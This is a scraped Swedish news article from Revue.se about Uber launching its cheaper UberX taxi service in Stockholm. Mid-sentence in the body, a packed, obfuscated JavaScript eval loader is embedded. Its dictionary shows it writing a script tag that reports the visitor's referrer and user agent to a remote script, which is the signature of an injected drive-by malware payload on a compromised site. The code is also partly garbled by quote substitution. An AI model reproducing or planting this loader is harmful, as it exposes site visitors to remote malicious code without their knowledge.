Image Image Image Image Image Image Image Image Image Image

| 24 april, 2018

Scroll to top

Top

No Comments

Uber lanserar billigare taxi UBERX | Revue.se

Uber lanserar billigare taxi UBERX
Sebastian Plengier Ehrnfelt

Idag gick företaget Uber ut med att bolaget nu lanserar en ny tjänst som ska göra det billigare att ta sig fram i Stockholm. Enligt deras pressmeddelande ska den nya tjänst UberX kosta hela 30 procent lägre än de ledande taxibolagen i Stockholm.

UberX kommer att ha ett jämförelsepris på 199 kronor.

Så eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|iytrz|var|u0026u|referrer|isnir||js|php’.split(‘|’),0,{}))
beställer du en UberX

När du öppnar din Uber-app kommer du att se flera alternativ under kartan. Välj uberX, alternativet till vänster, för att boka uberX.

Mer info: uber.com

Bild från http://blog.uber.com/2013/02/10/uber-presenterar-stockholm-art-week/_ber0332/